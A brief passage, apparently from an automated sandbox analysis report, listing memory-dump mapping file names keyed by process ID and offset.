                                                      • memory/4344-191-0x0000000000000000-mapping.dmp
                                                      • memory/4348-164-0x0000000000000000-mapping.dmp
                                                      • memory/4360-190-0x0000000000000000-mapping.dmp
                                                      • memory/4376-162-0x0000000000000000-mapping.dmp
                                                      • memory/4408-141-0x0000000000000000-mapping.dmp
                                                      • memory/4412-189-0x0000000000000000-mapping.dmp
                                                      • memory/4476-149-0x0000000000000000-mapping.dmp
                                                      • memory/4608-148-0x0000000000000000-mapping.dmp
                                                      • memory/4772-142-0x0000000000000000-mapping.dmp
                                                      • memory/4832-137-0x0000000000000000-mapping.dmp
                                                      • memory/4984-168-0x0000000000000000-mapping.dmp
                                                      • memory/5028-156-0x0000000000000000-mapping.dmp
                                                      • memory/5056-155-0x0000000000000000-mapping.dmp
                                                      • memory/5060-159-0x0000000000000000-mapping.dmp